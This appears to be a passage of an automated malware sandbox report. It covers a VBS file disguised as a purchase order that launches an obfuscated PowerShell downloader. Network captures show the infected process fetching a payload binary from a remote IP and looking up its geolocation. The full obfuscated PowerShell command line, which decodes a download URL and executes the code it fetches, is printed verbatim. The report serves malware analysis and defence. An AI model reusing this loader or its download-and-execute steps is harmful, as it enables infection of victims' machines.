                                                                                          Data Ascii: cZppjrYfj3TsxpBMN6ppjrYf4yRyZCxoN5ppjrYfWhHPTSkKdx6ojxMPQIX34CVOtx+o+kFezgpsli3ItB+oN2sN55SD03UG/DKjtv0OnfEhZOi3U3mRVY/eIwrxHaiPuZrGcEngkFU35jSyiEMhCs4eqI83Ytxnwx+ogDnUb4+2JnkLdpY1w7cfqNwNfKiPtp5TKDSlpIA5QU+LtkT7ZzvwrI/goXePth8pcWTI8+m5ku1osh/
                                                                                          May 2, 2024 18:39:11.603981018 CEST1289INData Raw: 67 70 38 52 79 6d 4c 6b 67 41 55 72 49 53 65 72 4b 76 33 72 37 52 4d 65 67 34 68 72 45 2b 77 7a 72 65 43 33 6b 6a 6a 77 73 38 71 73 54 33 69 43 6e 52 71 2b 45 33 48 6d 51 6b 6a 39 70 73 63 6f 72 2f 4f 6d 2b 62 42 50 74 70 41 55 6e 34 62 71 41 59
                                                                                          Data Ascii: gp8RymLkgAUrISerKv3r7RMeg4hrE+wzreC3kjjws8qsT3iCnRq+E3HmQkj9pscor/Om+bBPtpAUn4bqAY7GKqPtpZp3noN+Q4O5syuIL+WR2dcFq0AKeBlXaY/Y4lFtrLbToq5PZKvjbYfZEj0FR7wZRcatm64osaEJAyNcDcACAjFQCKGzmY54iSlgrHudRuWUjl8qrvCZ1C6qo8/mt2Nth8Q8OjbktwNJbAG2Z5biE/YbA5F
                                                                                          May 2, 2024 18:39:11.604012012 CEST1289INData Raw: 6e 54 2f 73 53 4e 37 6e 77 78 34 39 70 4c 69 46 77 74 48 74 77 62 4c 43 43 35 4c 79 31 4e 37 58 6c 66 53 41 73 32 38 57 65 47 32 71 79 50 75 52 35 62 6b 72 59 66 71 49 2b 32 48 36 69 50 74 68 2b 6f 6a 37 59 66 71 49 2b 32 48 36 69 50 74 68 2b 6f
                                                                                          Data Ascii: nT/sSN7nwx49pLiFwtHtwbLCC5Ly1N7XlfSAs28WeG2qyPuR5bkrYfqI+2H6iPth+oj7YfqI+2H6iPth+oj7YfqKrQBO+npI3L7W+3jdks+Pjm4fItBjM3qY+20xhAXNotv18rfPrTrSNpXYBkwxdjraYIpeu4+CjV7YQSWz+3TRI6OXssDnRAZuSFnkKb688f3iqWSYangi1UwQDjwazMr3LzY/uWyIqA3jw+cbr8yF61RNHAy
                                                                                          May 2, 2024 18:39:11.604065895 CEST1289INData Raw: 77 4d 76 5a 79 42 58 48 30 61 70 38 32 75 61 69 59 68 61 6c 4a 6d 43 46 47 79 4b 47 2b 5a 43 52 4c 6f 35 61 75 79 66 31 50 52 42 32 7a 44 74 66 6b 70 65 31 6c 44 35 49 70 66 52 74 6d 55 4c 51 33 37 52 30 47 37 32 6f 70 5a 65 73 47 73 45 7a 6e 67
                                                                                          Data Ascii: wMvZyBXH0ap82uaiYhalJmCFGyKG+ZCRLo5auyf1PRB2zDtfkpe1lD5IpfRtmULQ37R0G72opZesGsEzngyFuvw41Cndmpqm8KkNbXLMj4Llm6mFX+6yNgY9tJ2lKMHvSBoSxh9CdfK60KiXQmmjWQd3eYpcr8ufZOqD/5KUefmBaKX1sSoATN/XELEjG+xM//KmcK3ktecI6S5NwsmOMU0a3nwCzjuPkFChinQQIdZJVHU8p9Y
                                                                                          May 2, 2024 18:39:11.604078054 CEST1289INData Raw: 34 54 66 5a 66 49 6e 59 41 43 6c 35 33 6a 50 43 57 4f 57 44 49 57 79 2f 4c 44 57 33 5a 32 71 78 67 66 57 65 48 76 4d 59 66 41 2b 47 35 65 6c 62 75 65 58 4f 75 65 54 72 68 34 52 6b 74 36 45 78 65 71 78 59 43 59 79 46 34 36 4f 65 48 67 39 66 54 6b
                                                                                          Data Ascii: 4TfZfInYACl53jPCWOWDIWy/LDW3Z2qxgfWeHvMYfA+G5elbueXOueTrh4Rkt6ExeqxYCYyF46OeHg9fTkTRZobtnlMCV83l0T2i2I22H/o1iWTewzft5ArpjylNzoB+rD8dMx1ZdfiHKkaRicVxNnsS6faIi+iMNR8sE4HyKjC1GlWAhp0z+TbaeaO07HdE8s7++TZhJ5LtN+6GFR+fKU5af/ysN96G8q7lIY6yPCG582xjqUS
                                                                                          May 2, 2024 18:39:11.604140043 CEST1289INData Raw: 66 4a 44 73 67 45 30 37 31 5a 71 7a 46 32 79 64 4f 57 32 42 33 43 4d 44 6f 75 72 52 66 44 6f 4a 4d 2b 2b 39 32 6d 36 37 58 45 7a 6d 4f 72 36 5a 4c 65 69 53 35 35 75 58 67 56 42 70 39 30 4d 67 51 6c 6a 38 35 35 61 7a 64 54 75 79 67 35 30 69 4c 6d
                                                                                          Data Ascii: fJDsgE071ZqzF2ydOW2B3CMDourRfDoJM++92m67XEzmOr6ZLeiS55uXgVBp90MgQlj855azdTuyg50iLmCvZ5C9sw1mgasBqsT8pwjkDAGEAVoCRwpUyNtVBYmqkHWITDkPFKcZCNFKXm8TaenN+mbmA4OZPiqeN9NJqpADZtmeu2rl+mxZVSkKQL4ZbKBLspUZCXPvA02A27Z4Cj4F+v+BAMBqo+2TRIxczRGDkTGdoyFnkLo
                                                                                          May 2, 2024 18:39:11.604197979 CEST1289INData Raw: 4a 69 56 78 36 7a 77 41 46 66 77 44 37 73 56 4b 52 35 58 30 67 38 61 76 4d 4c 64 55 55 72 53 34 37 54 68 51 62 46 78 4f 67 30 31 6a 30 59 36 46 64 39 66 66 77 6f 77 71 50 7a 45 4b 57 56 6f 47 30 6c 61 43 2b 78 49 63 63 66 69 65 6b 32 2b 44 66 64
                                                                                          Data Ascii: JiVx6zwAFfwD7sVKR5X0g8avMLdUUrS47ThQbFxOg01j0Y6Fd9ffwowqPzEKWVoG0laC+xIccfiek2+DfdUwGcMkBrDxuoQysvXDAJwjNQTWcRe7M99+Sd3/voOuEpp2IUaxhqvJtqb1NXHeChx5PrqCl5SuLu5TfpmoWzOyl5Nmbx8jfZd+EOZP8TP/ihuCsmXv2zW66fA+VqniK3Hhx8RpZjUaeeB1kETPLOhEmoa42c5yB5K
                                                                                          May 2, 2024 18:39:11.604216099 CEST1289INData Raw: 51 2b 71 65 67 73 58 44 33 70 4a 56 39 4a 4b 4d 70 48 73 62 78 43 30 46 48 56 7a 72 36 48 71 69 50 65 6e 43 4f 41 47 4d 4f 2f 2f 30 58 43 69 67 76 77 33 62 53 2b 7a 36 75 2f 41 6d 65 4f 65 6f 4b 2b 6f 32 32 68 51 66 54 56 4b 76 46 44 51 39 7a 34
                                                                                          Data Ascii: Q+qegsXD3pJV9JKMpHsbxC0FHVzr6HqiPenCOAGMO//0XCigvw3bS+z6u/AmeOeoK+o22hQfTVKvFDQ9z4gwu7HiDOgN0UXBAbqRA/WMbqNgJYi/iJJ5fqg/xAA5BZ3Mw1Z5HOflD9Q5BdTxvTUk0BlAelhLQmlv9m+XuybwLstcZkcDO7RWAAQFi/DzeQe9Pkq2IuJDFjBdjILi8HX/2x22O73fRnGybdydq0Y/G90M8AliSsi
                                                                                          May 2, 2024 18:39:11.604228020 CEST1289INData Raw: 74 41 35 42 70 74 58 69 6b 4a 35 66 71 59 52 50 31 67 35 42 4b 76 65 72 79 70 35 76 4a 65 48 2f 62 39 6b 71 6c 6b 36 4f 69 49 4b 51 52 73 6b 53 31 4d 44 66 38 52 48 33 35 45 70 4d 61 37 72 6e 47 67 31 42 45 62 79 4d 50 2b 6e 2f 4d 75 68 66 50 56
                                                                                          Data Ascii: tA5BptXikJ5fqYRP1g5BKveryp5vJeH/b9kqlk6OiIKQRskS1MDf8RH35EpMa7rnGg1BEbyMP+n/MuhfPVMGSnmqlzh0F26+49oq1YaP179c8eNQId0Mnxge3Z5SQbYfqIAyQWGLtkX2D0gQ9wYrAqqPtqQV6QEk+DeBd0iug3qNkvQylQ3sdJ0T4gLHihgs6ec/D/SZyrHyKCHByHp1e68Cp2n/Lm6n4LVQzlSEK1FnqPkvJ/n
                                                                                          May 2, 2024 18:39:11.773900986 CEST1289INData Raw: 55 46 41 64 33 4d 62 71 4e 38 4f 78 33 57 75 51 79 72 64 70 6f 52 6b 72 57 71 6b 36 49 61 69 4a 42 6d 6a 4d 75 53 44 49 57 32 2f 48 54 55 4c 5a 6d 75 72 53 64 57 6d 36 52 7a 71 64 2f 38 4e 52 4a 7a 32 52 51 41 73 4a 6f 55 53 4c 35 37 55 37 4e 78
                                                                                          Data Ascii: UFAd3MbqN8Ox3WuQyrdpoRkrWqk6IaiJBmjMuSDIW2/HTULZmurSdWm6Rzqd/8NRJz2RQAsJoUSL57U7NxFcwAPEBuGMoy5afUQ6TPG8gtsRyPIskgXCBJcNg5ZoM0HJJ5fR4mko90qlkqGjILOCm5ovQ8TudnQhHVXE2EMpqwnQBP8MWIkXhubuKc+5hwjhrXneGhaxAtARSxP6ZYt47cfqEMTPb97dmPsM8aqhckHtuUc21u7


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          1192.168.2.44973887.121.105.184807444C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          May 2, 2024 18:39:55.572884083 CEST172OUTGET /sviLEH127.bin HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: 87.121.105.184
                                                                                          Cache-Control: no-cache
                                                                                          May 2, 2024 18:39:55.741688967 CEST1289INHTTP/1.1 200 OK
                                                                                          Date: Thu, 02 May 2024 16:39:55 GMT
                                                                                          Server: Apache/2.4.41 (Ubuntu)
                                                                                          Last-Modified: Tue, 30 Apr 2024 08:20:53 GMT
                                                                                          ETag: "78c40-6174c0c628340"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 494656
                                                                                          Content-Type: application/octet-stream
                                                                                          Data Raw: ad 92 3f 8e ea 3f 3d a0 2a 9e c5 9d 05 98 41 12 9b 36 66 20 72 00 2a 5f 28 15 45 f4 58 9c a0 e4 67 22 f1 0d c2 54 3d 39 35 1e a1 1c 95 45 2d 1b c8 d5 45 d1 11 00 28 88 60 2a e5 77 2c 2d f2 72 d4 e3 b6 54 e1 a1 14 1d ec f2 80 e7 3a 7c 93 fe 2c c9 88 f7 ad 7b 86 5e 4d 9d c6 4a 56 17 91 76 4b a2 b7 ab 89 bf c9 06 2d e0 a6 61 d6 13 da 70 a3 a0 10 4a 93 2c da 86 d2 85 12 51 1f 09 f9 8e 31 2c 7d bd 6a 83 f1 02 58 45 da 2c 42 49 e3 dd fe 70 c3 a1 84 66 8f e7 23 f7 aa 9d 31 3c b6 8b 5f 8b a6 b7 24 59 ad 1f 09 3f 14 d7 c9 61 61 fe b2 47 ff b8 98 54 47 e2 e8 38 fa 84 53 19 07 bb f7 2f 27 75 87 be a7 3d 33 97 2f 8e 07 26 6b ed 17 39 86 ff 32 dc 95 6d b0 b8 4c d1 d0 14 24 db 4d 46 a8 38 43 8b 0a 65 36 ba b4 98 2b 7c 30 51 4d 25 b8 2d 89 6a 07 24 0b 39 22 da 65 d3 8e 0b c8 fa 2f cc 6a a2 c2 80 7d 98 f1 5f c8 1a 68 d9 55 47 25 78 67 0f ca 80 3b ac ee 9f be 44 2a 0e b4 89 af 96 9e fd 73 06 e8 f3 48 5a 4e 18 ea 6c 08 4f fc e4 6c 39 ca b9 b9 10 2b b2 2f 33 00 ee 04 f9 93 91 6d 46 81 1e ac 06 5c 92 ec 9a eb 67 51 22 [TRUNCATED]
                                                                                          Data Ascii: ??=*A6f r*_(EXg"T=95E-E(`*w,-rT:|,{^MJVvK-apJ,Q1,}jXE,BIpf#1<_$Y?aaGTG8S/'u=3/&k92mL$MF8Ce6+|0QM%-j$9"e/j}_hUG%xg;D*sHZNlOl9+/3mF\gQ".iHmKlbf#vxV.:dTcY4}+XLE-i9)5K*J$a%JRM,o4O$kf\0R0/Rj>qazj/,8"dIr|<myYOJ|3!9"hjCX_."Tk~FxT|&v06k?[Wl=h3k|Iro{{G^tU\gmrSl`nmLgsd74oOCx*|LVo,b?)OIFqs(M6mBR&D9L:o?x)j4l*L8^B,f!Wk~H>$SEmG|cQLNP,M:3o>03}&F?v/.C#i~hlR7dLn<]SYIWP.eNV12imUdz nWZ^a"vgz0cDBU/JpVt [TRUNCATED]
                                                                                          May 2, 2024 18:39:55.741730928 CEST1289INData Raw: ca 3a e2 ad a8 c8 5f d9 85 e0 19 2b 69 32 c2 fd ce 85 94 c6 1d 9d 6d 4b dc 1e 86 89 22 dd 36 92 53 58 21 62 81 df c2 91 41 bd d5 95 e7 64 70 71 b6 7e 1a 20 3b 65 82 68 7b d2 d0 0c f2 0f e8 d8 78 5a 26 02 78 91 da 84 d4 3a 67 83 b3 47 37 17 19 4a
                                                                                          Data Ascii: :_+i2mK"6SX!bAdpq~ ;eh{xZ&x:gG7Jq"=nWvHU<dy )0\h0>Bc[BX84{)gnkFInuX5q*&_BI?CT@X~/s'*hU|hhyvX1a>/yg)6p
                                                                                          May 2, 2024 18:39:55.741744995 CEST1289INData Raw: 87 91 a9 2d e7 96 e7 3d b3 c8 57 3a 10 67 d3 52 c3 64 7b ba fb 85 c8 4a 00 4a 16 6e 25 5b e2 3a 2e 79 dc 7d 8f 05 3e 54 37 4e b2 30 91 b5 67 38 93 b7 3f 6d 0e ec 32 f1 79 02 79 0f 25 3f 12 2a 58 55 14 45 cb 0a ad 6b ed 56 ba a8 5a e6 bd da 30 b0
                                                                                          Data Ascii: -=W:gRd{JJn%[:.y}>T7N0g8?m2yy%?*XUEkVZ0|iM,#$&l_SqOg!sL|N'&"\z_[O@3X{%I\]sTV6a|VKBxe(p'wdmpzHlJWJvTA2
                                                                                          May 2, 2024 18:39:55.741784096 CEST1289INData Raw: 80 73 e7 17 71 58 2e df 27 38 7b 74 d9 05 49 b5 30 79 1d 80 39 9b 80 2e 20 43 78 5c 28 c9 d3 01 ad 6b fa e6 c3 3f 1f 8e 5d 56 a1 db d3 5d 28 18 73 b5 55 02 dd 08 84 5d 01 17 45 11 61 be 48 9b b1 fa c2 78 67 83 4f 1d f0 07 97 c3 82 ec 6f 34 6d 46
                                                                                          Data Ascii: sqX.'8{tI0y9. Cx\(k?]V](sU]EaHxgOo4mFnwr~G.%DC'9Sz)GV'O\E~-7}a$=#=V<H?*<0;1hj!Hqqk*ZH!Nt~|~bp3hLtO|e3N6"icfE
                                                                                          May 2, 2024 18:39:55.741802931 CEST1289INData Raw: bf d3 14 5f 75 09 cc 10 87 cf 66 23 a8 81 e0 36 ef 70 01 00 13 6c e9 71 6c 7a be f9 c2 29 86 4c cd 87 36 47 94 40 6e 37 b7 fb a5 3f 4e 29 7a 78 9f 12 87 27 62 52 c7 ae e6 18 a2 e6 85 50 f1 2f 36 88 8f 7b 85 11 40 e0 17 1e 50 77 9a ce a9 37 d5 63
                                                                                          Data Ascii: _uf#6plqlz)L6G@n7?N)zx'bRP/6{@Pw7c!#Y{.O)$zdUTaL?Yec>RJ0Hqxln{LTKUW_J@m> pbJ+%7j7s'?`h
                                                                                          May 2, 2024 18:39:55.741852999 CEST1289INData Raw: e5 b1 e2 f9 0d 4a 0d d4 32 8f bc bd 6a 4c 71 aa 91 c4 e6 2b f3 5b 4a 50 03 d0 42 c0 a3 96 0c 12 cb 7e dc 81 47 da bc da 41 95 c0 9f fc 49 25 90 2a 7f e3 86 23 76 e3 97 ce 6c 87 79 cc fd a2 9a c3 64 6b 91 58 d6 24 08 2f 4c 06 39 c3 d1 f8 f2 95 aa
                                                                                          Data Ascii: J2jLq+[JPB~GAI%*#vlydkX$/L9<]>t)_v!q$'A NS7iZpX2xBk/k6n-u@)xCt}kh%(h,3f1s&d><DL.Yc]RPS*9-TzbY
                                                                                          May 2, 2024 18:39:55.741879940 CEST1289INData Raw: 66 31 56 5e 0d 13 10 49 22 90 67 85 1c 79 f5 e2 97 69 70 de 1d 7a cc 02 3d 8c 4f 93 81 46 58 ad 3b 8b d1 b4 62 26 48 1e 4e 23 64 55 f6 60 44 b7 03 ed ce b8 3d 9b fe 82 6b c9 db 73 55 56 11 bb 85 d9 b6 8a 9f a1 95 2d 8d e7 24 33 44 ff dd 81 65 b4
                                                                                          Data Ascii: f1V^I"gyipz=OFX;b&HN#dU`D=ksUV-$3De Qj^Hc-3kkB 6yU[JUv@}w))+Q(Yi,v0hYhRe T3s%I|j]#|zC@8i
                                                                                          May 2, 2024 18:39:55.741929054 CEST1289INData Raw: 85 1b 2d f1 c4 69 63 e9 74 48 27 da c1 c3 5b 51 46 71 82 de b7 0a 6e a5 38 bf 00 45 c2 7f bd 0e 56 3a e9 c3 28 db 45 e1 7d 71 73 b0 72 be fa 99 50 38 54 e2 a1 45 f5 f6 f2 80 e7 9c 41 97 fe 7d ee 88 f7 ad 2a 6e 46 0d 9d c6 13 94 13 91 9f 60 a2 b7
                                                                                          Data Ascii: -ictH'[QFqn8EV:(E}qsrP8TEA}*nF`1c'#--3_oQ}G0~lMli.-}}u&/|-4{dUr=~9SPAc,8VW8q?jKl|dd)Q+P!zU1z0|yt _:/NW~L
                                                                                          May 2, 2024 18:39:55.741977930 CEST1289INData Raw: 4c 09 82 8e a0 ff b0 94 4d 6f 46 d9 bf dd 2c 51 0d b8 7f cd f3 2d 01 93 fe 94 99 05 ba bd 93 ef 5e 0d 9d 96 c7 13 1f c1 fb 06 ae 5f ca 89 bf c9 56 a0 a5 5a ea 18 43 32 01 52 5f ef 1a 1e 61 d2 6e 9e 85 12 51 47 83 37 66 e7 30 c7 b3 e1 f1 a6 44 9c
                                                                                          Data Ascii: LMoF,Q-^_VZC2R_anQG7f0DpHXHF<XR1T;Y@ mrV}NFWUlKc!ArClqA[hrszTaT7"DT*HL/QYl<Gk~-/Y
                                                                                          May 2, 2024 18:39:55.741991043 CEST1289INData Raw: c9 6e 89 c8 66 bb f8 76 cb ed 26 a6 2e 4e 7d 3c ec 25 73 e7 84 0c 1a 7b f2 07 79 2d 06 d6 5d 9c c6 ac 66 25 c2 38 4c 35 bc 3e 92 27 a6 19 70 8f e3 79 5d c2 f3 1c 2e 3a 5a be c2 28 9a 01 0f b8 7e 28 1b d4 20 98 f6 1c a0 94 55 3d 05 92 e9 7d d1 cd
                                                                                          Data Ascii: nfv&.N}<%s{y-]f%8L5>'py].:Z(~( U=}!V}R$s{0k\ X7uqIB&@qSF a&~nkc!T:ob-s~t."60Q-?o6de6*r]h}d
                                                                                          May 2, 2024 18:39:55.912467957 CEST1289INData Raw: 38 a4 64 10 d2 9c 02 24 89 a5 97 48 4a 1a 07 cc ea 37 82 26 e2 75 c8 62 f7 b5 ad 27 e7 ec 20 0a d1 c1 7b 30 8c cd a9 85 f4 4a 2d f1 8e 37 fb 43 22 49 da 8e e4 47 f6 a9 6c bb fd f8 44 18 f8 b8 7c a4 87 59 8e 10 a5 ab 19 c8 22 41 6c d6 b7 70 65 fe
                                                                                          Data Ascii: 8d$HJ7&ub' {0J-7C"IGlD|Y"AlpeCWa7A&-Af"+[t-Zk\Ls=Z5>cpN*Tp*al'o3dL%<+!{E>W\nsXT-1MU5awt4IC0.


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          2192.168.2.449742178.237.33.50807444C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          May 2, 2024 18:40:04.424149990 CEST71OUTGET /json.gp HTTP/1.1
                                                                                          Host: geoplugin.net
                                                                                          Cache-Control: no-cache
                                                                                          May 2, 2024 18:40:04.595818043 CEST1173INHTTP/1.1 200 OK
                                                                                          date: Thu, 02 May 2024 16:40:04 GMT
                                                                                          server: Apache
                                                                                          content-length: 965
                                                                                          content-type: application/json; charset=utf-8
                                                                                          cache-control: public, max-age=300
                                                                                          access-control-allow-origin: *
                                                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                          Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                          Click to jump to process

                                                                                          Click to jump to process

                                                                                          Click to dive into process behavior distribution

                                                                                          Click to jump to process

                                                                                          Target ID:0
                                                                                          Start time:18:38:50
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs"
                                                                                          Imagebase:0x7ff624d10000
                                                                                          File size:170'496 bytes
                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:18:39:02
                                                                                          Start date:02/05/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr) Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals 'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant (Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals 